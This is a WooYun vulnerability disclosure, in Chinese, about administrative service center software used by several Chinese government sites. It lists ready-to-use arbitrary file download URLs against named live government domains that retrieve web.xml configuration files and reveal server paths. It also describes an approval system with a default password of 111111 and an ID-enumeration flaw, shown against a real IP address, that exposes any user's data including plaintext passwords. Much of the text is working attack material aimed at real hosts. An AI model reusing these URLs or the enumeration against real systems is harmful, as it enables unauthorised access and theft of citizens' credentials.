WooYun.org

技术支持服务：上海卓繁信息技术股份有限公司
0x01:行政服务中心任意文件下载漏洞（全版本）
说明：这里验证几种不同的版本，测试发现都可下载配置文件web.xml，且路径中暴露网站绝对路径。
http://tlzw.tongliao.gov.cn/servlet/FileDownload?filepath=D:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat6_tongliao\webapps\ROOT\WEB-INF\web.xml&dispname=web.xml
http://www.zwfw.gov.cn/index/downLoadGonggaoAtta.action?filePath=D:\zfwork\tomcat_web_new\webapps\ROOT\WEB-INF\web.xml&fileName=web.xml
http://www.whxzfw.gov.cn/index/downLoadFile.action?filePath=/WEB-INF/web.xml&fileName=web.xml
http://www.xczwzx.gov.cn/FileDownload?filepath=F:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat\webapps\ROOT\WEB-INF/web.xml&dispname=web.xml
………
0x02:网上审批系统泄露用户信息（包含明文密码）
说明：可从“行政服务中心”的“网上咨询”或“网上申报”点击进入该系统中。
任意注册用户即可登录到系统中，且用户默认密码为 111111。
在系统中找到“修改用户密码”时，抓包得到数据类似
xzfw/modiNetUser.action?user_id=17 的请求，这里修改参数user_id即可遍历任意用户资料（包含明文密码）
这里通过站点 http://221.229.249.58 站点为例。